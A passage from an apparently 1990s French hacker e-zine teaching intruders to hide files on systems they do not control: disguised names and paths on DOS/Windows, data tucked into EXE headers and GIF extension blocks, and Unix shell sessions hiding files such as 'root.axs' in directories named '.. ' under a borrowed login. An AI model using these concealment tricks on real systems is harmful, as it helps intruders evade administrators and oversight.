ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ I) Intro & Thanks & Disclaimer ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Dans la, heum, discipline, qui est la notre il arrive souvent que nous ayions a dissimuler une certaine quantit‚ de Data sur un systeme que nous visitions, ou qui possede des resources auquelles nous n'avons pas access, et generalement dont il ne profite pas pleinement. Il nous arrive aussi d'avoir a communiquer dans un environnement peu sur et control‚ par des individus paranoiaques et megalomanes. C'est pour ces deux raisons que j'ai ecrit ce file. Il s'adresse a tous, et j'espere qu'il vous sera utile (Que j'ai pas pass‚ des nuits blanches pour rien, quoi). Remerciements/greets/good_karma a NeurAlien, Omega et O'Connell pour etre qui ils sont. GreetZ a tous les lecteurs de N0Way. N'oubliez pas que l'avenir; c'est vous. Et que vous etes defini par vos actions, et non votre pass‚. This file also dedicated to Mr Toubon for his open mindedness and his efforts towards harmonious internationalisation. Also to Mr Pasqua for his efforts to preserve peace at all cost and his unswaying belief in the principles of democracy, justice, and freedom. Bon, je suis sur que NeurAlien vas nous faire une superbe Disclaimer qui couvre tout, mais j'aimerais rajouter la mienne: De ce texte complet, je n'ais ecrit et pens‚ que ces trois lignes. Dans ces trois lignes, une et une seule est un mensonge. Avant-hier, j'ai pens‚ voir un OVNI. Faites moi du mail sur ce que vous pensez de ce Disclaimer, et vos id‚es pour faire mieux. II) Cacher un file dans le OS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Bon, d'abord les principes de base. Si vous etes sur un systeme '‚tranger' (dont vous n'avez pas le controle complet), il arrive que vous vouliez posseder quelques files (fichiers), sans que les autres users, ou meme le Supervisor, ne le sache. Il faut donc les cacher. 1) Les attributs de systeme: La, on pense tout de suite aux attributs speciaux de fichiers (Cach‚ ou Systeme, sous MS-DOS). Mais, si ces attributs font partie du systeme ils sont tres connus, et bon nombre de programmes peuvent les modifier, ou les ignorent tout simplement. Ils servent en general a proteger l'utilisateur de lui meme, en evitant par exemple qu'il n'efface des fichiers systemes. Par exemple: Cr‚‚z un fichier DOS puis faites soit ATTRIB +H ou ATTRIB +S dessus, et allez dans le file manager de Windows (Vous ne l'utilisez peut etre pas souvent, mais le proprietaire de systeme si). Allez sur le drive/dir ou est votre fichier cach‚. Normalement vous ne le voyez pas. Vous ne pouvez pas non plus l'effacer. Maintenant allez dans Affichage/Par type de fichiers. Cliquez sur 'Visualiser les fichiers systemes/cach‚s'. En revenant a l'ecran principal vous devriez voir votre fichier, mais en plus il aura un point d'exclamation rouge a cot‚ de son nom, et il n'est plus tres discret maintenant. De meme, si vous avez LapLink 3 (recommand‚), vous avez surement remarqu‚ qu'il affiche les fichiers normaux en gris-DOS standard, mais les fichiers cach‚s ou systemes sont affich‚s en Blanc (High intensity) avec un '*' devant leur nom. Ideal pour se faire reperer. 2) Le choix: Les attributs du systeme peuvent donc soit bien dissimuler le fichier, soit le rendre tres evident. Il y a donc un choix a faire. Pensez vous que la/les personnes a qui vous voulez dissimuler le fichier seront assez intelligentes pour cliquer sur le bouton ? (C'est une vraie question, pas une question rhetorique). La reponse par default, dans mon cas, est Oui. Je prefere ne pas cacher mes files et utiliser d'autres options. 3) Tout en haut de l'arbre: Comme un object cach‚ dans un arbre, un file cach‚ profond en haut de l'arbre est plus dur a reperer que si vous le laissiez dans la racine. En regle generale il ne faut rien mettre dans la racine, et preferer au moins 2 niveaux de profondeure. Voici un exemple: Pour une raison qui m'est propre je devais charger un TSR sur une PC en reseau Novell. Il fallait une ligne dans l'autoexec, et un endroit ou mettre le fichier sur le disque dur. Cette machine etait frequement utilis‚ par le SUPERVISOR (on se demande ce que faisait le TSR, hum ;-)) et l'AUTOEXEC.BAT lan‡ait un antivirus resident qui scannait la racine de C: au demarage. Les noms des fichiers sur C:\ s'affichant pendant le scan. J'ai donc mis le fichier dans C:\DOS. Ainsi il n'etait pas remarqu‚ par le scan, et la ligne dans l'autoexec ne paraissait pas suspecte car l'autoexec.bat sert justement a charger des programmes du repertoire DOS. Cet exemple me permet d'ajouter qu'il faut toujours essayer de placer un fichier parmi ses semblables, du moins exterieurement (j'y reviendrait en 4). Un autre exemple: J'avais un fichier de +4Mo a dissimuler sur un poste en local, le temps que je puisse amener de quoi le backup et le ramener chez moi. Je l'ai mis dans C:\EXCEL\EXEMPLES\AUTRE, il y a de cela au moins 6 mois. A derniŠre verification il y etait encore. Peu de gens s'aventurent haut dans un arbre, surtout s'il parait conforme. Une petite note quand meme: N'en faites pas trop. Il ne faut pas que le chemin soit sensiblement plus long que la moyenne sur le disque, car un backup ou un TREE pourrait le reperer aisement. Pour clore cette partie il me faut reserver une mention speciale a nos amis de chez M$, et plus particulierement le repertoire WINDOWS\SYSTEM. Celui-ci existe sur la grande majorit‚ des machines, peut etre meme la votre. Combien d'entre vous savent combien de fichiers ils ont dans ce repertoire, et ce que fait chaque fichier ? En gros, on peut TOUT fourrer dans ce repertoire, si ce n'est ni trop gros ni trop voyant. Personne ne s'en rendra compte. 4) "A rose by any other name would smell as sweet" Pour ceux qui n'auraient pas compris ma citation de Shakespeare, Juliet dit qu'une rose, meme si on changait son nom, aurait quand meme la (bonne) odeure d'une rose. Mais un file ne sent pas, d'ou l'interet de changer son nom pour le dissimuler (Logique suspecte). Un nom qui fasse temporaire ( *.$$$, ~*.TMP, etc) est assez bon pour une courte periode, mais un sys/user intelligent risque de l'effacer au bout d'un moment. Un nom invent‚ est bon, de preference un nom qui ne soit pas comprehensible, de sorte a faire fichier systeme. Explication: En general un user va essayer de lire un file du nom README.NOW, il lira probablement le file WHATEVER.TXT, peut etre pas WHATEVER.DAT et surement pas PR4)Q567 sans extension. Un nom de ce type est bon, mais ce n'est pas ce qui se fait de mieux. Le nom devrait s'integrer a son environnement. Regardez se qui existe deja dans les alentours. Par exemple j'ai mis deux fichiers (HACK et VIEW pour ceux que cela interresse) dans le ROOT d'un drive ou il existait MENU1.OLD et MENU2.OLD. Simplement en les appelent MENU3.OLD et MENU4.OLD ils sont restes 'invisibles' pendant plus d'un mois (puis je les ais enlev‚). CONFIG.OLD (ou .CPS ou .B~K) et la meme chose pour AUTOEXEC font de bon depos temporaires. Pour une plus longue echeance essayer TD451.DRV dans \WINDOWS\SYSTEM ou un truc du genre. 5) Conclusion (de part I) Petite conclusion rapide. Les trois regles d'or pour planquer un file sont: - Le mettre ou en utilisation normale un user ne le verait meme pas. - Que son nom s'integre a son environnement. - Choisir un nom/extension que l'user ne penserait pas, en marche normale a lire/ouvrir/lancer/etc. Et en, heu, regle d'argent: - Autant que possible, le crypter. 6) PS et PPS PS: Si vous cryptez le file il ne faut PAS que cela soit apparent, par exemple PGP met '----- BEGIN PGP MESSAGE -----' (ou un truc du genre) au debut de ce qu'il crypte. Si un sys/user voit cela il risque fort de le delete immediatement. PPS: Dans la serie Revenge/Annoy si vous voulez simplement irriter le sys/user dans ce cas faites tout le contraire de ce que dit ce file. Un fichier de 8Mo du nom de SECRET.COD, OCCULT.SEX, VIRUS.XXX dans le ROOT, completement crypt‚ (du garbage au hasard) avec en premiere ligne 'JF-DES Crypted block. Checksum: 834A4C12' risque grandement d'amuser un sys/user, surtout si il en retrouve des variantes subtiles partout sur son disque :-) III) Cacher un file dans un autre ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Une technique encore plus subtile, et de par la meme meilleure, est de cacher un file directement dans un autre. Le file 'host' devrait etre un fichier anodin, qui a droit de residence legitime sur le systeme. Cela peut permettre de dissimuler encore plus efficacement un file sur un systeme, mais egalement (et probablement encore plus important) est que cette technique permet de cr‚er un chemin sur entre 2 personnes a travers une zone non-sure du CyberSpace. Exemple: Dans les interets de la securit‚ nationale et du peuple, un gouvernement debonnaire a rendu l'echange d'informations crypt‚s ill‚gales. Non respet de cette loi vous fera deport‚ en Antarctique. Mais, CyberPunk que vous etes, vous devez envoyer vos C0deZ a quelqu'un. Vous ecrivez votre message, le cryptez. Puis vous digitalisez une photo de votre maison, inserez votre file dans la photo (en rempla‡ant le gresillement (l'aglomeration urbaine derriŠre chez vous en low-res) du fond par votre file crypt‚), puis vous U/L le tout a votre ami. Ce que je viens de decrire est fiction, mais montre un peu les possibilit‚s de cette technique, qui commence d'ailleurs a faire du bruit (Remarquez l'allusion). [ OUh ouh Arscene, ce n'est plus Fiction !!! Cypherella des cypherpunks l'a fait sur Mac deja et j'ai eu des echos comme quoi la meme chose existe sur PC et Unix pour int‚grer du code PGP a du JPEG et du GIF. ++NeurAlien] 1) Un peu de pratique Voici quelque endroits, sur PC, ou un file pourrait etre cach‚: - Dans un TXT: Un fichier TXT se finit par un CR, LF (qui font aller a la ligne) et un marqueur de fin de fichier. En Hex, cela donne 0D 0A 1A. Ajoutez ces 3 bytes a la fin d'un fichier TXT, puis ajoutez du text aprŠs, et ni TYPE ni EDIT n'afficheront ce nouveau text. Voici en detail: COPY CON FIRST.TXT >Essai de text XXX^Z (1 fichier ecrit) [Editez ce fichier et remplacez les 3 X respectivement par 0D, 0A et 1A] COPY CON TWO.TXT >Text secret^Z (1 fichier ecrit) COPY FIRST.TXT + TWO.TXT /b FINAL.TXT TYPE FINAL.TXT Essai de text Si vous ouvrez a nouveau FINAL.TXT dans votre editeur Hex vous verrez les 2 lignes. Cette technique n'est pas terrible en pratique (car un bon editeur ASCII ou traitement de texte fera apparaitre tout le texte) mais sert bien de demonstration - Dans un EXE: Tout EXE commence par un header d'une longeure variable de bytes, et avec l'utilisation rependue de compresseurs d'EXE le seul vrai moyen de voir si un header est valide est de lancer l'EXE. Pour inclure ce que vous voulez dans le header il suffit d'allonger sa taille. Cette taille s'exprime en paragraphes (16 bytes = 1 pararaph), est un WORD et ce trouve au 5Šme WORD du fichier (10Šme et 11Šme byte). AprŠs avoir ajout‚ la longeure de votre fichier / 16 ( + un peu pour etre sur ) au header il suffit d'inclure votre fichier a la fin de ce header. L'EXE devrait toujours fonctionner sans probleme. Si vous compez automatiser l'operation, il est bon d'inclure aussi la longeure du fichier en bytes et l'ancienne longueure du header. - Dans un GIF: Un GIF est form‚ de plusieures blocs. Un bloc commence par soit par un ',', (une virgule quoi), si c'est une image, par ';' si c'est la fin du fichier (bon, ok, c'est pas vraiment un bloc), ou par '!' si c'est une extension. La, cela devient interressant. Une extension peut etre n'importe quoi, un commentaire par exemple, en general un viewer de GIF reconnait certaines extension, et ignore tout simplement les valeures qu'il ne connait pas. D'ou l'id‚e de se faire un bloc 'Secret info'. Bon, comme aucun d'entre vous ne paye sa comm pour D/L N0Way, je peut sans crainte vous balancer ces extraits des DOC officielles: La premiŠre concerne les extensions GIF en general: GIF Extension Blocks are packaged in a manner similar to that used by the raster data though not compressed. The basic structure is: 7 6 5 4 3 2 1 0 Byte # +---------------+ |0 0 1 0 0 0 0 1| 1 '!' - GIF Extension Block Introducer +---------------+ | function code | 2 Extension function code (0 to 255) +---------------+ ---+ | byte count | | +---------------+ | : : +-- Repeated as many times as necessary |func data bytes| | : : | +---------------+ ---+ . . . . . . +---------------+ |0 0 0 0 0 0 0 0| zero byte count (terminates block) +---------------+ A GIF Extension Block may immediately preceed any Image Descriptor or occur before the GIF Terminator. All GIF decoders must be able to recognize the existence of GIF Extension Blocks and read past them if unable to process the function code. La seconde concerne le bloc d'extension particulier qui nous interresse: 26. Application Extension. a. Description. The Application Extension contains application-specific information; it conforms with the extension block syntax, as described below, and its block label is 0xFF. b. Required Version. 89a. c. Syntax. 7 6 5 4 3 2 1 0 Field Name Type +---------------+ 0 | | Extension Introducer ['!'] Byte +---------------+ 1 | | Extension Label [0xFF] Byte +---------------+ +---------------+ 0 | | Block Size [11] Byte +---------------+ 1 | | +- -+ 2 | | +- -+ 3 | | Application Identifier 8 Bytes +- -+ 4 | | +- -+ 5 | | +- -+ 6 | | +- -+ 7 | | +- -+ 8 | | +---------------+ 9 | | +- -+ 10 | | Appl. Authentication Code 3 Bytes +- -+ 11 | | +---------------+ +===============+ | | | | Application Data Data Sub-blocks | | | | +===============+ +---------------+ 0 | | Block Terminator Byte +---------------+ i) Extension Introducer - Defines this block as an extension. This field contains the fixed value 0x21 ['!' en ASCII]. ii) Application Extension Label - Identifies the block as an Application Extension. This field contains the fixed value 0xFF. iii) Block Size - Number of bytes in this extension block, following the Block Size field, up to but not including the beginning of the Application Data. This field contains the fixed value 11. iv) Application Identifier - Sequence of eight printable ASCII characters used to identify the application owning the Application Extension. v) Application Authentication Code - Sequence of three bytes used to authenticate the Application Identifier. An Application program may use an algorithm to compute a binary code that uniquely identifies it as the application owning the Application Extension. d. Extensions and Scope. This block does not have scope. This block cannot be modified by any extension. e. Recommendation. None. Bon, j'espere que tout le monde a compris :-) Ce qu'il faut faire devient plus clair: Trouvez un endroit ou mettre notre bloc, par exemple la fin du fichier ( seek(file, -1, SEEK_END); en C. La fin d'un GIF est marqu‚ par un ';' ). Il suffit d'y inserer un '!', le code disant que ceci est une Application Extension (0xFF), le numero 11, puis votre ID specifique (Sur Compu$serve en forum PICS il y a une liste rassemblent tous le Application ID deja utilis‚s, liste ger‚ par Larry Wood). Puis vous mettez votre code de 3 bytes, sorte de signature pour verifier que ce n'est pas un faux bloc, puis finalement vous balancez votre file, sans trop vous soucier de la compression (qui selon la doc doit etre RLE), car de toute fa‡on il sera decod‚ par un soft maison, et pas par le viewer de GIF. Verifiez quand meme qu'aucun byte ne vaut 0, car ce byte marque la fin du bloc. Voila, une methode discrete et ais‚. Merci Compu$serve. 2) Finalement... Au fait, j'ai trait‚ certaines methodes, et j'espere que vous pensez deja a d'autres (elles sont illimit‚s). Mais, je n'ais pas parl‚ de celle mentionn‚ dans l'intro, du Crypted text dans du graphic. Ben, heu, a vous de la faire :-) Serieusement j'etudie la question, et j'ai vu certains programmes sur BBS qui pretendait faire exactement cela. Peut-etre un article ulterieure (enfin, j'ai dit peut-etre)... X) Bon, ben la le file est fini. J'espere que vous avez appreci‚, car ce fut interessant a ecrire. En cas ou vous auriez deja oubli‚, me llamo Arscene, et je prends data/info/mail/insultes/louanges/ demandes_en_marriage/pots_de_vin/prix_pulitzer/etc en bal Arscene sur The 0NE, le RTC EFZ, ou sur A-D. Si besoin, voici ma cl‚: -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.3a mQCNAi501fkAAAEEAMJm9gMhAGYaOnjYFzTVWxAX17rDX4tUjRG7wD6u5BgyOWFL gtyx3p8NQJCtjZOuRGOvSRFdm0l/fYY3qWbaXFOSRAY516ihc0OZurYaTROoIk3u /PuCUC9cHJmnFX6LpHj8MUtEpk1A19dM5UYmKQekDcSavCPv/xRorln5z03NAAUR tAdBcnNjZW5l =IosC -----END PGP PUBLIC KEY BLOCK----- Contactez moi en BAL avant de m'envoyer quelque chose de confidentiel pour verifier que vous avez bien ma VRAIE cl‚. --------------------------------------------------------------------- -%!% N0 Way %!%- Volume I, Num‚ro 3, Partie 3.7 w____OO____w Playing hide 'n' seek in CyberSpace by ++NeurAlien /\/OO\/\ Hey, je recois a l'instant l'article tres kewl d'Arscene et je me dis "Helluvabitch... wud B kewl 2 make de zame dingz 4 yunixzz zyztemz !" (ce qui veut dire Mr Allg00d : "ta mere en Slip bleu devant le Prisu' chausse du 2 !" Ouhahaha ) Alors, voila, je vais vous montrer comment jouer au gros chien avec son admin de systeme Unix en lui cachant des trucs n'importe ou. Ceci est utilisable sans programme sp‚ciaux ni quoi: vous avez juste a connaitre la m‚tthode. Et ensuite je vais vous montrer comment vous amuser enormement avec les nerfs des admins de serveurs FTP sur le reseau Internet par le biais des Incomings directories. Ce N-Phile est dedicace tout specialement … Arscene qui s'applique toujours … nous fournir des articles qui relevent le niveau de N0 Way... (Ca va plaire, la distribution de NW 3 est assur‚e … grande ‚chelle cette fois ci ! :)) Je tiens a remercier aussi les quelques personnes qui m'ont enseign‚es l'art du hacking sous Unix, le Department of Defense aux USA sans lequel je n'aurais jamais eu acces a l'Internet (ni vous d'ailleur), les chiens dans la rue pour m'avoir souvent permis de me d‚fouler, les "experts en s‚curit‚" pour m'avoir souvent fait rire et enfin la brasserie Valstar SA pour m'avoir souvent d‚pann‚ ;)) Ou est ce que je me planque en local? ==================================== Well... Sous Unix c'est pas comme sous DOS, les attributs Caches et systemes, hum, yen a pas trop. Par contre unix a un gros avantage: il accepte BEAUCOUP BEAUCOUP de caracteres dans ses noms de fichier. Par exemple, il accepte les espaces dans ses noms de fichier. Ainsi on peut facilement dissimuler cr‚er des fichier qui seront difficilement accessibles. On peut cr‚er un fichier "sale admin" par exemple mais bon, ca se remarque ! Exemple 1: ======> Script started on Thu Sep 15 02:16:15 1994 DaubeNet-tmp {101} ls -al total 2 drwx------ 2 fred emprunte 512 Sep 15 02:16 . drwx------ 11 fred emprunte 512 Sep 15 02:16 .. -rw------- 1 fred emprunte 0 Sep 15 02:16 ex1 DaubeNet-tmp {102} cat >"sale admin" Haha, gros nain, tu sais meme pas effacer un fichier pfff.... ^D DaubeNet-tmp {103} exit ======> Script done on Thu Sep 15 02:17:36 1994 Alors la, l'admin quand il se pointe il voie: ======> Script started on Thu Sep 15 02:19:04 1994 DaubeNet-tmp {101} ls -al total 3 drwx------ 2 fred emprunte 512 Sep 15 02:17 . drwx------ 12 fred emprunte 512 Sep 15 02:17 .. -rw------- 1 fred emprunte 62 Sep 15 02:17 sale admin DaubeNet-tmp {102} exit ======> Script done on Thu Sep 15 02:19:18 1994 Ehehe, voila... Et la l'admin il aura beau tenter: ======> Script started on Thu Sep 15 02:19:22 1994 root# ls -al total 3 drwx------ 2 fred emprunte 512 Sep 15 02:17 . drwx------ 12 fred emprunte 512 Sep 15 02:17 .. -rw------- 1 fred emprunte 62 Sep 15 02:17 sale admin root# rm sale admin rm: sale: No such file or directory. rm: admin: No such file or directory. root# echo ARghhhhhh ARghhhhhh root# exit ======> Script done on Thu Sep 15 02:19:45 1994 Bref, pour l'effacer, en fait tout ce qu'il suffit de faire c'est: ======> Script started on Thu Sep 15 02:20:57 1994 DaubeNet-tmp {101} ls -al total 3 drwx------ 2 fred emprunte 512 Sep 15 02:17 . drwx------ 12 fred emprunte 512 Sep 15 02:17 .. -rw------- 1 fred emprunte 62 Sep 15 02:17 sale admin DaubeNet-tmp {102} rm "sale admin" DaubeNet-tmp {103} ls -al total 2 drwx------ 2 fred emprunte 512 Sep 15 02:21 . drwx------ 12 fred emprunte 512 Sep 15 02:17 .. DaubeNet-tmp {104} exit ======> Script done on Thu Sep 15 02:21:11 1994 Ca c'est marrant pour faire un peu chier l'admin mais quand vous voulez reellement planquer des trucs, il faut la jouer plus fine. Si par exemple root.axs et milnet.dialup sont tres importants pour vous et que vous empruntez le login de quelqu'un, vous pouvez les cacher tres simplement. Exemple 2: ======> Script started on Thu Sep 15 02:25:11 1994 DaubeNet-fred {101} ls -al total 46 drwx------ 12 fred emprunte 512 Sep 15 02:24 . drwxrwxr-x 5 root wheel 512 Sep 9 12:03 .. -rwx------ 1 fred emprunte 655 Sep 3 1993 .Xmodmaprc -rwx------ 1 fred emprunte 8331 Sep 3 1993 .Xresources -rwx------ 1 fred emprunte 653 Jul 4 15:21 .cshrc drwx------ 2 fred emprunte 512 Jun 12 22:31 .elm -rw------- 1 fred emprunte 2229 Jul 4 17:45 .history -rwx------ 1 fred emprunte 207 Sep 3 1993 .login -rwx------ 1 fred emprunte 105 Sep 3 1993 .mailrc -rwx------ 1 fred emprunte 83 Sep 3 1993 .profile -rwx------ 1 fred emprunte 7908 Sep 3 1993 .twmrc -rwx------ 1 fred emprunte 866 Sep 3 1993 .xinitrc drwx------ 2 fred emprunte 512 Jun 12 22:31 Mail -rw------- 1 fred emprunte 260 Sep 15 02:24 milnet.dialup -rw------- 1 fred emprunte 1040 Sep 15 02:24 root.axs drwx------ 7 fred emprunte 512 Jun 20 01:40 src drwx------ 2 fred emprunte 512 Sep 15 02:21 tmp drwx------ 5 fred emprunte 512 Jul 4 14:45 tools [voici nos fichiers] DaubeNet-fred {102} ll milnet.dialup root.axs 1 -rw------- 1 fred emprunte 260 Sep 15 02:24 milnet.dialup 2 -rw------- 1 fred emprunte 1040 Sep 15 02:24 root.axs [On cr‚e le directory fantome] DaubeNet-fred {103} mkdir ".. " [On met nos fichiers dedans] DaubeNet-fred {104} mv milnet.dialup root.axs ".. " [OOOooOOoOoOps, ca fait drole quand meme deux directory ".." !!!] DaubeNet-fred {105} ls -al total 44 drwx------ 13 fred emprunte 512 Sep 15 02:25 . drwxrwxr-x 5 root wheel 512 Sep 9 12:03 .. drwx------ 2 fred emprunte 512 Sep 15 02:25 .. -rwx------ 1 fred emprunte 655 Sep 3 1993 .Xmodmaprc -rwx------ 1 fred emprunte 8331 Sep 3 1993 .Xresources -rwx------ 1 fred emprunte 653 Jul 4 15:21 .cshrc drwx------ 2 fred emprunte 512 Jun 12 22:31 .elm -rw------- 1 fred emprunte 2229 Jul 4 17:45 .history -rwx------ 1 fred emprunte 207 Sep 3 1993 .login -rwx------ 1 fred emprunte 105 Sep 3 1993 .mailrc -rwx------ 1 fred emprunte 83 Sep 3 1993 .profile -rwx------ 1 fred emprunte 7908 Sep 3 1993 .twmrc -rwx------ 1 fred emprunte 866 Sep 3 1993 .xinitrc drwx------ 2 fred emprunte 512 Jun 12 22:31 Mail drwx------ 7 fred emprunte 512 Jun 20 01:40 src drwx------ 2 fred emprunte 512 Sep 15 02:21 tmp drwx------ 5 fred emprunte 512 Jul 4 14:45 tools DaubeNet-fred {106} cd ".. " DaubeNet-fred {107} ls -al total 5 drwx------ 2 fred emprunte 512 Sep 15 02:25 . drwx------ 13 fred emprunte 512 Sep 15 02:25 .. -rw------- 1 fred emprunte 260 Sep 15 02:24 milnet.dialup -rw------- 1 fred emprunte 1040 Sep 15 02:24 root.axs DaubeNet-fred {108} cd .. DaubeNet-fred {109} mv ".. \milnet.dialup" . DaubeNet-fred {110} ls -al total 45 drwx------ 13 fred emprunte 512 Sep 15 02:26 . drwxrwxr-x 5 root wheel 512 Sep 9 12:03 .. drwx------ 2 fred emprunte 512 Sep 15 02:26 .. -rwx------ 1 fred emprunte 655 Sep 3 1993 .Xmodmaprc -rwx------ 1 fred emprunte 8331 Sep 3 1993 .Xresources -rwx------ 1 fred emprunte 653 Jul 4 15:21 .cshrc drwx------ 2 fred emprunte 512 Jun 12 22:31 .elm -rw------- 1 fred emprunte 2229 Jul 4 17:45 .history -rwx------ 1 fred emprunte 207 Sep 3 1993 .login -rwx------ 1 fred emprunte 105 Sep 3 1993 .mailrc -rwx------ 1 fred emprunte 83 Sep 3 1993 .profile -rwx------ 1 fred emprunte 7908 Sep 3 1993 .twmrc -rwx------ 1 fred emprunte 866 Sep 3 1993 .xinitrc drwx------ 2 fred emprunte 512 Jun 12 22:31 Mail -rw------- 1 fred emprunte 260 Sep 15 02:24 milnet.dialup drwx------ 7 fred emprunte 512 Jun 20 01:40 src drwx------ 2 fred emprunte 512 Sep 15 02:21 tmp drwx------ 5 fred emprunte 512 Jul 4 14:45 tools DaubeNet-fred {111} mv ".. /milnet.dialup" . DaubeNet-fred {112} ls -al total 47 drwx------ 13 fred emprunte 512 Sep 15 02:26 . drwxrwxr-x 5 root wheel 512 Sep 9 12:03 .. drwx------ 2 fred emprunte 512 Sep 15 02:26 .. -rwx------ 1 fred emprunte 655 Sep 3 1993 .Xmodmaprc -rwx------ 1 fred emprunte 8331 Sep 3 1993 .Xresources -rwx------ 1 fred emprunte 653 Jul 4 15:21 .cshrc drwx------ 2 fred emprunte 512 Jun 12 22:31 .elm -rw------- 1 fred emprunte 2229 Jul 4 17:45 .history -rwx------ 1 fred emprunte 207 Sep 3 1993 .login -rwx------ 1 fred emprunte 105 Sep 3 1993 .mailrc -rwx------ 1 fred emprunte 83 Sep 3 1993 .profile -rwx------ 1 fred emprunte 7908 Sep 3 1993 .twmrc -rwx------ 1 fred emprunte 866 Sep 3 1993 .xinitrc drwx------ 2 fred emprunte 512 Jun 12 22:31 Mail -rw------- 1 fred emprunte 260 Sep 15 02:24 milnet.dialup -rw------- 1 fred emprunte 1040 Sep 15 02:24 root.axs drwx------ 7 fred emprunte 512 Jun 20 01:40 src drwx------ 2 fred emprunte 512 Sep 15 02:21 tmp drwx------ 5 fred emprunte 512 Jul 4 14:45 tools [Alors pour pas faire trop louche, on va creer un directory pour un utilitaire bien obscure et qui semble utile … l'admin. Pour le trouver, reflechissez un peu et pas la peine de mettre ".Xnewsrc " si votre systeme n'a pas les news ;] DaubeNet-fred {113} mkdir ".Xnewsrc " DaubeNet-fred {114} mv root.axs milnet.dialup ".Xnewsrc " DaubeNet-fred {115} cd ".Xnewsrc " DaubeNet-fred {116} ls milnet.dialup root.axs DaubeNet-fred {117} ll total 3 1 -rw------- 1 fred emprunte 260 Sep 15 02:24 milnet.dialup 2 -rw------- 1 fred emprunte 1040 Sep 15 02:24 root.axs DaubeNet-fred {118} ls -al total 5 drwx------ 2 fred emprunte 512 Sep 15 02:27 . drwx------ 14 fred emprunte 512 Sep 15 02:27 .. -rw------- 1 fred emprunte 260 Sep 15 02:24 milnet.dialup -rw------- 1 fred emprunte 1040 Sep 15 02:24 root.axs DaubeNet-fred {119} cd .. DaubeNet-fred {120} ll total 43 1 drwx------ 2 fred emprunte 512 Sep 15 02:26 .. 1 -rwx------ 1 fred emprunte 655 Sep 3 1993 .Xmodmaprc 1 drwx------ 2 fred emprunte 512 Sep 15 02:27 .Xnewsrc 9 -rwx------ 1 fred emprunte 8331 Sep 3 1993 .Xresources 1 -rwx------ 1 fred emprunte 653 Jul 4 15:21 .cshrc 1 drwx------ 2 fred emprunte 512 Jun 12 22:31 .elm 3 -rw------- 1 fred emprunte 2229 Jul 4 17:45 .history 1 -rwx------ 1 fred emprunte 207 Sep 3 1993 .login 1 -rwx------ 1 fred emprunte 105 Sep 3 1993 .mailrc 1 -rwx------ 1 fred emprunte 83 Sep 3 1993 .profile 8 -rwx------ 1 fred emprunte 7908 Sep 3 1993 .twmrc 1 -rwx------ 1 fred emprunte 866 Sep 3 1993 .xinitrc 1 drwx------ 2 fred emprunte 512 Jun 12 22:31 Mail 1 drwx------ 7 fred emprunte 512 Jun 20 01:40 src 1 drwx------ 2 fred emprunte 512 Sep 15 02:21 tmp 1 drwx------ 5 fred emprunte 512 Jul 4 14:45 tools [ c'est discret et ca apparait pas sans l'option "-a" de "ls"] DaubeNet-fred {121} ls -l total 12 drwx------ 2 fred emprunte 512 Jun 12 22:31 Mail drwx------ 7 fred emprunte 512 Jun 20 01:40 src drwx------ 2 fred emprunte 512 Sep 15 02:21 tmp drwx------ 5 fred emprunte 512 Jul 4 14:45 tools DaubeNet-fred {122} rm -fr ".Xnewsrc " DaubeNet-fred {123} ls -al total 44 drwx------ 13 fred emprunte 512 Sep 15 02:27 . drwxrwxr-x 5 root wheel 512 Sep 9 12:03 .. drwx------ 2 fred emprunte 512 Sep 15 02:26 .. -rwx------ 1 fred emprunte 655 Sep 3 1993 .Xmodmaprc -rwx------ 1 fred emprunte 8331 Sep 3 1993 .Xresources -rwx------ 1 fred emprunte 653 Jul 4 15:21 .cshrc drwx------ 2 fred emprunte 512 Jun 12 22:31 .elm -rw------- 1 fred emprunte 2229 Jul 4 17:45 .history -rwx------ 1 fred emprunte 207 Sep 3 1993 .login -rwx------ 1 fred emprunte 105 Sep 3 1993 .mailrc -rwx------ 1 fred emprunte 83 Sep 3 1993 .profile -rwx------ 1 fred emprunte 7908 Sep 3 1993 .twmrc -rwx------ 1 fred emprunte 866 Sep 3 1993 .xinitrc drwx------ 2 fred emprunte 512 Jun 12 22:31 Mail drwx------ 7 fred emprunte 512 Jun 20 01:40 src drwx------ 2 fred emprunte 512 Sep 15 02:21 tmp drwx------ 5 fred emprunte 512 Jul 4 14:45 tools DaubeNet-fred {124} exit ======> Script done on Thu Sep 15 02:28:05 1994 Interressant n'est ce pas? Comme ca on peut planquer des trucs sympa meme si il y a un petit "d" au tout debut de l'affichage, on peut quand meme les cacher la dedans car en g‚n‚ral les admins sont trop flemmards pour aller fouiller la dedans. Le nombre d'espace a la fin du fichier peut varier, un seul espace c'est tout de suite ce que l'on teste, mais si vous en mettez 42, c'est beaucoup moins ‚vident. L'int‚ret de cr‚er des fichier commencant par "." est qu'ils ne sont pas list‚s … moins qu'on donne l'option "-a" a la commande "ls". Vous pouvez aussi inclure des caracteres de controles dans le nom de vos fichier comme ^X ou ^T mais je d‚conseille car ca attire plutot l'attention. Comment je planque mes images? ============================= Dans certaines ecoles, il y a des rŠgles pas si conne que ca qui interdisent les images sur leur r‚seau et donc des moulinettes tournent tous les jours pour traquer les .gif, .jpg etc... Pour eviter de vous les faire detruire, vous pouvez les cacher dans des fichiers TAR. exemple: ======> Script started on Thu Sep 15 02:49:50 1994 DaubeNet-tmp {101} ls -al total 778 drwx------ 2 fred emprunte 512 Sep 15 02:49 . drwx------ 13 fred emprunte 512 Sep 15 02:27 .. -rw------- 1 fred emprunte 557056 Sep 15 02:49 hardfuck.gif -rw------- 1 fred emprunte 221184 Sep 15 02:48 susan.gif DaubeNet-tmp {102} tar cvf projet-math.tar hardfuck.gif susan.gif hardfuck.gif susan.gif tar: tar vol 1, 2 files, 0 bytes read, 788480 bytes written. DaubeNet-tmp {103} ll total 1560 552 -rw------- 1 fred emprunte 557056 Sep 15 02:49 hardfuck.gif 784 -rw------- 1 fred emprunte 788480 Sep 15 02:50 projet-math.tar 224 -rw------- 1 fred emprunte 221184 Sep 15 02:48 susan.gif DaubeNet-tmp {106} rm hardfuck.gif DaubeNet-tmp {107} rm susan.gif DaubeNet-tmp {108} ll total 784 784 -rw------- 1 fred emprunte 788480 Sep 15 02:50 projet-math.tar DaubeNet-tmp {109} compress projet-math.tar DaubeNet-tmp {110} ll total 5 5 -rw------- 1 fred emprunte 